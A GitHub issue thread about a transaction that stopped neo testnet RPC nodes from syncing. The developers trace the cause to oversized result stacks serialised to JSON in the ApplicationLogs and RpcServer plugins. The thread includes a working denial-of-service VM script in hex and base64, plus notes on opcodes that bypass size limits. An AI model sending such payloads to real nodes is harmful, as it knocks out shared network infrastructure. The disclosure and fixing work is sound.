neo icon indicating copy to clipboard operation
neo copied to clipboard

all RPC nodes on testnet stopped syncing maybe caused by some modules

Open dusmart opened this issue 2 years ago • 17 comments

Describe the bug Accidentally, we constructed a tx that leaves lots of large StackItems on Result Stack. After sending that, all seed nodes stopped syncing.

To Reproduce

  • sending a tx like this 0x40e171249642639be3e54dd6acfe5948b1d3f240f505e7a3403cdc9bd3e1068a

Expected behavior All nodes go well.

Screenshots image

(Optional) Additional context We suspect that this is caused by some neo modules.

dusmart avatar Mar 03 '22 09:03 dusmart

curl http://seed5t4.neo.org:20332 -d '{ 
  "jsonrpc": "2.0",
  "id": 1,
  "method": "getblockcount",
  "params": [
    "0x40e171249642639be3e54dd6acfe5948b1d3f240f505e7a3403cdc9bd3e1068a"
  ]
}'

{"jsonrpc":"2.0","id":1,"result":1245636}

They all now stuck at 1245636.

dusmart avatar Mar 03 '22 09:03 dusmart

seems it is because of bugs of plugins like application-log or something else ~

vang1ong7ang avatar Mar 03 '22 09:03 vang1ong7ang

It should be a bug from applicationlog since cli runs after I delete applicationlog.

superboyiii avatar Mar 03 '22 09:03 superboyiii

the script is:

0200001000884a4a4a ... 4a4a    ;; (2047 * '4a')

vang1ong7ang avatar Mar 03 '22 09:03 vang1ong7ang

The ResultStack is 2GB

image

Jim8y avatar Mar 03 '22 15:03 Jim8y

Based on @dusmart 's exploit,

construct a new exploit that requires 1024 GB of memory:

newbuffer, dup, dup,,,,,,,pack(from here, every stackitem is 1GB), dup, dup, dup, dup, dup

AgAAEACISkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkp KSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKS kpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkp KSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKS kpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkp KSkpKSkpKSkpKSkpKSkpKSkpKSgHoA8BKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKS kpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkp KSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKS kpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkp KSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpK

This script consumes incredible amount of memorys. oom on my 64GB memory machine.

Jim8y avatar Mar 03 '22 19:03 Jim8y

I think the root cause is we only consider the cpu usage ignoring memory cost when set OpCode price. OpCodes like NEWBUFFER DUP are fixed price no matter how many memory they use. Hence a script use 2G memory only cost 0.00013101gas.

ZhangTao1596 avatar Mar 04 '22 01:03 ZhangTao1596

construct a new exploit that requires 1024 GB of memory:

newbuffer, dup, dup,,,,,,,pack(from here, every stackitem is 1GB), dup, dup, dup, dup, dup

There is StackItem size limit https://github.com/neo-project/neo-vm/blob/b18e040d2115ed2ea3c9a60ae8722a7865b38927/src/neo-vm/ExecutionEngineLimits.cs#L39 You can't create a 1GB item. The maximum is about 1MB.

ZhangTao1596 avatar Mar 04 '22 01:03 ZhangTao1596

@ZhangTao1596 Nop, i checked the code, no size check under the PACK OpCode

Just create 1024 1MB buffers, then pack them together,,,,,,,

Similar Opcodes that can bypass the size limitation:

PACKMAP PACKSTRUCT CAT

Jim8y avatar Mar 04 '22 01:03 Jim8y

@Liaojinghui Can you look at https://github.com/neo-project/neo-vm/blob/b18e040d2115ed2ea3c9a60ae8722a7865b38927/src/neo-vm/ExecutionEngine.cs#L1643. I'm not sure if items packed are still count in ReferenceCounter.

ZhangTao1596 avatar Mar 04 '22 02:03 ZhangTao1596

@Liaojinghui Can you look at https://github.com/neo-project/neo-vm/blob/b18e040d2115ed2ea3c9a60ae8722a7865b38927/src/neo-vm/ExecutionEngine.cs#L1643. I'm not sure if items packed are still count in ReferenceCounter.

@ZhangTao1596 The MaxStackSize here is the number of items It wont stop you from having 2048 items of 1GB

BTW, to answer your question, packed items are remoted from ReferenceCounter, referenceCounter.RemoveStackReference(item);

        /// <summary>
        /// The maximum number of items that can be contained in the VM's evaluation stacks and slots.
        /// </summary>
        public uint MaxStackSize { get; init; } = 2 * 1024;

Jim8y avatar Mar 04 '22 02:03 Jim8y

Based on @dusmart 's exploit,

construct a new exploit that requires 1024 GB of memory:

newbuffer, dup, dup,,,,,,,pack(from here, every stackitem is 1GB), dup, dup, dup, dup, dup

AgAAEACISkpKSkpKSkpK...

This script consumes incredible amount of memorys. oom on my 64GB memory machine.

Solution:

* set a size limit to `stackitem` or give every stack a maximum size.

* check item size before pusing it to stack

By debugging on Windows, I found no significantly high memory usage during the whole VM execution. But there comes a memory leak at https://github.com/neo-project/neo-modules/blob/32aacc468ad43600817daabbec834e715017d962/src/RpcServer/RpcServer.SmartContract.cs#L78

json["stack"] = new JArray(engine.ResultStack.Select(p => ToJson(p, settings.MaxIteratorResultItems)));

if the script is called through RPC. Then we can suspect that https://github.com/neo-project/neo-modules/blob/32aacc468ad43600817daabbec834e715017d962/src/ApplicationLogs/LogReader.cs#L156

var txJson = TxLogToJson(appExec);

in plugin ApplicationLogs, especially https://github.com/neo-project/neo-modules/blob/32aacc468ad43600817daabbec834e715017d962/src/ApplicationLogs/LogReader.cs#L74

trigger["stack"] = appExec.Stack.Select(q => q.ToJson()).ToArray();

can lead to memory leak. With 36 DUP instructions constructing 37 1MB-buffers, the JString objects takes more than 100MB memory. memory analysis And there could be more memory cost when JObjects are turned into string.

Hecate2 avatar Mar 04 '22 03:03 Hecate2

We have to limit the items in the ResultStack in ApplicationLogs.

erikzhang avatar Mar 04 '22 09:03 erikzhang

sending a tx like this 0x40e171249642639be3e54dd6acfe5948b1d3f240f505e7a3403cdc9bd3e1068a

NeoGo has no problem with this:

{
   "id" : 5,
   "result" : {
      "executions" : [
         {
            "vmstate" : "HALT",
            "trigger" : "Application",
            "gasconsumed" : "13053",
            "stack" : [
               "error: unserializable: nil",
               "error: unserializable: nil",
               "error: unserializable: nil",
               "error: unserializable: nil",
               "error: unserializable: nil",
               "error: unserializable: nil",
               "error: unserializable: nil",

So our nodes never stopped and worked just fine.

newbuffer, dup, dup,,,,,,,pack(from here, every stackitem is 1GB), dup, dup, dup, dup, dup

But this script breaks the node, so it should be investigated.

roman-khimov avatar Mar 04 '22 09:03 roman-khimov

newbuffer, dup, dup,,,,,,,pack(from here, every stackitem is 1GB), dup, dup, dup, dup, dup

But this script breaks the node, so it should be investigated.

And it's all purely JSONization issue, the script itself runs fine and does not consume a lot of memory as @Hecate2 already noticed, but an attempt to make a JSON out of it does.

roman-khimov avatar Mar 04 '22 09:03 roman-khimov

I think we'll just limit the JSON size. We have two ways to JSONize stack items, one is used for StdLib's jsonSerialize and another for user-facing things (like RPC) with the latter having type information. ToJSON is size-limited (as well as conversion to binary representation, so I think the node would handle this script in a transaction fine), but ToJSONWithTypes is not and that's what we're going to fix (optimizing it along the way, because ToJSON is much faster in some cases).

roman-khimov avatar Mar 04 '22 09:03 roman-khimov

@roman-khimov May you please test this case?

I don't think it differs a lot from the previous one, it'll all be fixed by nspcc-dev/neo-go#2386.

roman-khimov avatar Mar 05 '22 09:03 roman-khimov

I think this one was solved quite a while ago and can be closed now.

roman-khimov avatar Sep 09 '22 20:09 roman-khimov